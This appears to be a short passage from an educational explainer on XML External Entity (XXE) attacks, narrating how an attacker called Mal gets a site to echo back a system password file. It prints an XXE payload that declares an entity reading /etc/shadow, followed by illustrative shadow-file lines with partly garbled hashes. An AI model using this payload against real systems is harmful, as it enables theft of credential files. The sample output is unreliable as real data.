XML External Entities

However, as part of the error reporting back to Mal, the site includes the fully expanded XML file - which incorporates the user information file. The trap is sprung!
The hacker victorious.
error.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xrds [
<!ENTITY passwords SYSTEM "file://etc/shadow">
]>
<xrds>
  root:$6$9K3EQkch$PTpXh6M×5mmAVmC
  admin:$1$3.9г4eV$3nHTS5X7CJOYv9
  daemon:*:18642:0:99999:7
  bin:*:18642:0:99999:7
  sys:*:18642:0:99999:7
  sync:*:18642:0:99999:7
</xrds>